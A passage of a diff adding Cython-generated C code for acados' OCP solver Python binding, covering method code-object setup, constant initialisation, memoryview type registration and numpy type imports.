<<<<<<<<<<<<<< + * """ + * Returns the cost value of the current solution. + */ + __pyx_tuple__67 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_out); if (unlikely(!__pyx_tuple__67)) __PYX_ERR(0, 444, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__67); + __Pyx_GIVEREF(__pyx_tuple__67); + __pyx_codeobj__68 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__67, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_cost, 444, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__68)) __PYX_ERR(0, 444, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":460 + * + * + * def get_residuals(self, recompute=False): # <<<<<<<<<<<<<< + * """ + * Returns an array of the form [res_stat, res_eq, res_ineq, res_comp]. + */ + __pyx_tuple__69 = PyTuple_Pack(5, __pyx_n_s_self, __pyx_n_s_recompute, __pyx_n_s_out, __pyx_n_s_double_value, __pyx_n_s_field); if (unlikely(!__pyx_tuple__69)) __PYX_ERR(0, 460, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__69); + __Pyx_GIVEREF(__pyx_tuple__69); + __pyx_codeobj__70 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__69, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_residuals, 460, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__70)) __PYX_ERR(0, 460, __pyx_L1_error) + __pyx_tuple__71 = PyTuple_Pack(1, Py_False); if (unlikely(!__pyx_tuple__71)) __PYX_ERR(0, 460, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__71); + __Pyx_GIVEREF(__pyx_tuple__71); + + /* "acados_template/acados_ocp_solver_pyx.pyx":492 + * + * # Note: this function should not be used anymore, better use cost_set, constraints_set + * def set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * + * """ + */ + __pyx_tuple__72 = PyTuple_Pack(12, __pyx_n_s_self, __pyx_n_s_stage, __pyx_n_s_field_2, __pyx_n_s_value, __pyx_n_s_cost_fields, __pyx_n_s_constraints_fields, __pyx_n_s_out_fields, __pyx_n_s_mem_fields, __pyx_n_s_field, __pyx_n_s_value_2, __pyx_n_s_dims, __pyx_n_s_msg); if (unlikely(!__pyx_tuple__72)) __PYX_ERR(0, 492, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__72); + __Pyx_GIVEREF(__pyx_tuple__72); + __pyx_codeobj__73 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 12, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__72, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_set, 492, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__73)) __PYX_ERR(0, 492, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":551 + * + * + * def cost_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the cost module of the solver. + */ + __pyx_tuple__74 = PyTuple_Pack(8, __pyx_n_s_self, __pyx_n_s_stage, __pyx_n_s_field_2, __pyx_n_s_value, __pyx_n_s_field, __pyx_n_s_dims, __pyx_n_s_value_2, __pyx_n_s_value_shape); if (unlikely(!__pyx_tuple__74)) __PYX_ERR(0, 551, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__74); + __Pyx_GIVEREF(__pyx_tuple__74); + __pyx_codeobj__75 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__74, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_cost_set, 551, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__75)) __PYX_ERR(0, 551, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":584 + * + * + * def constraints_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the constraint module of the solver. + */ + __pyx_codeobj__76 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__74, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_constraints_set, 584, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__76)) __PYX_ERR(0, 584, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":619 + * + * + * def dynamics_get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get numerical data from the dynamics module of the solver: + */ + __pyx_tuple__77 = PyTuple_Pack(6, __pyx_n_s_self, __pyx_n_s_stage, __pyx_n_s_field_2, __pyx_n_s_field, __pyx_n_s_dims, __pyx_n_s_out); if (unlikely(!__pyx_tuple__77)) __PYX_ERR(0, 619, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__77); + __Pyx_GIVEREF(__pyx_tuple__77); + __pyx_codeobj__78 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__77, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_dynamics_get, 619, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__78)) __PYX_ERR(0, 619, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":641 + * + * + * def options_set(self, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set options of the solver. + */ + __pyx_tuple__79 = PyTuple_Pack(10, __pyx_n_s_self, __pyx_n_s_field_2, __pyx_n_s_value, __pyx_n_s_int_fields, __pyx_n_s_double_fields, __pyx_n_s_string_fields, __pyx_n_s_field, __pyx_n_s_int_value, __pyx_n_s_double_value, __pyx_n_s_string_value); if (unlikely(!__pyx_tuple__79)) __PYX_ERR(0, 641, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__79); + __Pyx_GIVEREF(__pyx_tuple__79); + __pyx_codeobj__80 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 10, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__79, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_options_set, 641, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__80)) __PYX_ERR(0, 641, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_codeobj__81 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__81)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_tuple__82 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__82)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__82); + __Pyx_GIVEREF(__pyx_tuple__82); + __pyx_codeobj__83 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__82, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 3, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__83)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + __pyx_int_0 = PyInt_FromLong(0); if (unlikely(!__pyx_int_0)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_1 = PyInt_FromLong(1); if (unlikely(!__pyx_int_1)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_2 = PyInt_FromLong(2); if (unlikely(!__pyx_int_2)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_3 = PyInt_FromLong(3); if (unlikely(!__pyx_int_3)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_4 = PyInt_FromLong(4); if (unlikely(!__pyx_int_4)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_6 = PyInt_FromLong(6); if (unlikely(!__pyx_int_6)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_7 = PyInt_FromLong(7); if (unlikely(!__pyx_int_7)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_112105877 = PyInt_FromLong(112105877L); if (unlikely(!__pyx_int_112105877)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_136983863 = PyInt_FromLong(136983863L); if (unlikely(!__pyx_int_136983863)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_184977713 = PyInt_FromLong(184977713L); if (unlikely(!__pyx_int_184977713)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_neg_1 = PyInt_FromLong(-1); if (unlikely(!__pyx_int_neg_1)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_neg_5 = PyInt_FromLong(-5); if (unlikely(!__pyx_int_neg_5)) __PYX_ERR(0, 1, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + /* AssertionsEnabled.init */ + __Pyx_init_assertions_enabled(); + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + /* NumpyImportArray.init */ + /* + * Cython has automatically inserted a call to _import_array since + * you didn't include one when you cimported numpy. To disable this + * add the line + * numpy._import_array + */ +#ifdef NPY_FEATURE_VERSION +#if !NO_IMPORT_ARRAY +if (unlikely(_import_array() == -1)) { + PyErr_SetString(PyExc_ImportError, "numpy.core.multiarray failed to import " + "(auto-generated because you didn't call 'numpy.import_array()' after cimporting numpy; " + "use 'numpy._import_array' to disable if you are certain you don't need it)."); +} +#endif +#endif + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __pyx_collections_abc_Sequence = Py_None; Py_INCREF(Py_None); + generic = Py_None; Py_INCREF(Py_None); + strided = Py_None; Py_INCREF(Py_None); + indirect = Py_None; Py_INCREF(Py_None); + contiguous = Py_None; Py_INCREF(Py_None); + indirect_contiguous = Py_None; Py_INCREF(Py_None); + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_spec, NULL); if (unlikely(!__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython)) __PYX_ERR(0, 52, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_spec, __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) < 0) __PYX_ERR(0, 52, __pyx_L1_error) + #else + __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython = &__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) < 0) __PYX_ERR(0, 52, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_dictoffset && __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_AcadosOcpSolverCython, (PyObject *) __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) < 0) __PYX_ERR(0, 52, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) < 0) __PYX_ERR(0, 52, __pyx_L1_error) + #endif + __pyx_vtabptr_array = &__pyx_vtable_array; + __pyx_vtable_array.get_memview = (PyObject *(*)(struct __pyx_array_obj *))__pyx_array_get_memview; + #if CYTHON_USE_TYPE_SPECS + __pyx_array_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_array_spec, NULL); if (unlikely(!__pyx_array_type)) __PYX_ERR(1, 114, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_array_type->tp_as_buffer = &__pyx_tp_as_buffer_array; + if (!__pyx_array_type->tp_as_buffer->bf_releasebuffer && __pyx_array_type->tp_base->tp_as_buffer && __pyx_array_type->tp_base->tp_as_buffer->bf_releasebuffer) { + __pyx_array_type->tp_as_buffer->bf_releasebuffer = __pyx_array_type->tp_base->tp_as_buffer->bf_releasebuffer; + } + #elif defined(Py_bf_getbuffer) && defined(Py_bf_releasebuffer) + /* PY_VERSION_HEX >= 0x03090000 || Py_LIMITED_API >= 0x030B0000 */ + #elif defined(_MSC_VER) + #pragma message ("The buffer protocol is not supported in the Limited C-API < 3.11.") + #else + #warning "The buffer protocol is not supported in the Limited C-API < 3.11." + #endif + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_array_spec, __pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #else + __pyx_array_type = &__pyx_type___pyx_array; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_array_type->tp_print = 0; + #endif + if (__Pyx_SetVtable(__pyx_array_type, __pyx_vtabptr_array) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_MemviewEnum_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_MemviewEnum_spec, NULL); if (unlikely(!__pyx_MemviewEnum_type)) __PYX_ERR(1, 302, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_MemviewEnum_spec, __pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #else + __pyx_MemviewEnum_type = &__pyx_type___pyx_MemviewEnum; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_MemviewEnum_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_MemviewEnum_type->tp_dictoffset && __pyx_MemviewEnum_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_MemviewEnum_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #endif + __pyx_vtabptr_memoryview = &__pyx_vtable_memoryview; + __pyx_vtable_memoryview.get_item_pointer = (char *(*)(struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_get_item_pointer; + __pyx_vtable_memoryview.is_slice = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_is_slice; + __pyx_vtable_memoryview.setitem_slice_assignment = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *, PyObject *))__pyx_memoryview_setitem_slice_assignment; + __pyx_vtable_memoryview.setitem_slice_assign_scalar = (PyObject *(*)(struct __pyx_memoryview_obj *, struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_setitem_slice_assign_scalar; + __pyx_vtable_memoryview.setitem_indexed = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *, PyObject *))__pyx_memoryview_setitem_indexed; + __pyx_vtable_memoryview.convert_item_to_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *))__pyx_memoryview_convert_item_to_object; + __pyx_vtable_memoryview.assign_item_from_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *, PyObject *))__pyx_memoryview_assign_item_from_object; + __pyx_vtable_memoryview._get_base = (PyObject *(*)(struct __pyx_memoryview_obj *))__pyx_memoryview__get_base; + #if CYTHON_USE_TYPE_SPECS + __pyx_memoryview_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_memoryview_spec, NULL); if (unlikely(!__pyx_memoryview_type)) __PYX_ERR(1, 337, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_memoryview_type->tp_as_buffer = &__pyx_tp_as_buffer_memoryview; + if (!__pyx_memoryview_type->tp_as_buffer->bf_releasebuffer && __pyx_memoryview_type->tp_base->tp_as_buffer && __pyx_memoryview_type->tp_base->tp_as_buffer->bf_releasebuffer) { + __pyx_memoryview_type->tp_as_buffer->bf_releasebuffer = __pyx_memoryview_type->tp_base->tp_as_buffer->bf_releasebuffer; + } + #elif defined(Py_bf_getbuffer) && defined(Py_bf_releasebuffer) + /* PY_VERSION_HEX >= 0x03090000 || Py_LIMITED_API >= 0x030B0000 */ + #elif defined(_MSC_VER) + #pragma message ("The buffer protocol is not supported in the Limited C-API < 3.11.") + #else + #warning "The buffer protocol is not supported in the Limited C-API < 3.11." + #endif + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_memoryview_spec, __pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #else + __pyx_memoryview_type = &__pyx_type___pyx_memoryview; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_memoryview_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_memoryview_type->tp_dictoffset && __pyx_memoryview_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_memoryview_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_memoryview_type, __pyx_vtabptr_memoryview) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + __pyx_vtabptr__memoryviewslice = &__pyx_vtable__memoryviewslice; + __pyx_vtable__memoryviewslice.__pyx_base = *__pyx_vtabptr_memoryview; + __pyx_vtable__memoryviewslice.__pyx_base.convert_item_to_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *))__pyx_memoryviewslice_convert_item_to_object; + __pyx_vtable__memoryviewslice.__pyx_base.assign_item_from_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *, PyObject *))__pyx_memoryviewslice_assign_item_from_object; + __pyx_vtable__memoryviewslice.__pyx_base._get_base = (PyObject *(*)(struct __pyx_memoryview_obj *))__pyx_memoryviewslice__get_base; + #if CYTHON_USE_TYPE_SPECS + __pyx_t_1 = PyTuple_Pack(1, (PyObject *)__pyx_memoryview_type); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 952, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_memoryviewslice_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_memoryviewslice_spec, __pyx_t_1); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_memoryviewslice_type)) __PYX_ERR(1, 952, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_memoryviewslice_spec, __pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #else + __pyx_memoryviewslice_type = &__pyx_type___pyx_memoryviewslice; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_memoryviewslice_type->tp_base = __pyx_memoryview_type; + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_memoryviewslice_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_memoryviewslice_type->tp_dictoffset && __pyx_memoryviewslice_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_memoryviewslice_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_memoryviewslice_type, __pyx_vtabptr__memoryviewslice) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __pyx_t_1 = PyImport_ImportModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_t_1)) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_7cpython_4type_type = __Pyx_ImportType_3_0_0(__pyx_t_1, __Pyx_BUILTIN_MODULE_NAME, "type", + #if defined(PYPY_VERSION_NUM) && PYPY_VERSION_NUM < 0x050B0000 + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #elif CYTHON_COMPILING_IN_LIMITED_API + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #else + sizeof(PyHeapTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyHeapTypeObject), + #endif + __Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_7cpython_4type_type) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyImport_ImportModule("numpy"); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 202, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_5numpy_dtype = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "dtype", sizeof(PyArray_Descr), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArray_Descr),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_dtype) __PYX_ERR(2, 202, __pyx_L1_error) + __pyx_ptype_5numpy_flatiter = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "flatiter", sizeof(PyArrayIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_flatiter) __PYX_ERR(2, 225, __pyx_L1_error) + __pyx_ptype_5numpy_broadcast = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "broadcast", sizeof(PyArrayMultiIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayMultiIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_broadcast) __PYX_ERR(2, 229, __pyx_L1_error) + __pyx_ptype_5numpy_ndarray = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ndarray", sizeof(PyArrayObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ndarray) __PYX_ERR(2, 238, __pyx_L1_error) + __pyx_ptype_5numpy_generic = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "generic", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_generic) __PYX_ERR(2, 812, __pyx_L1_error) + 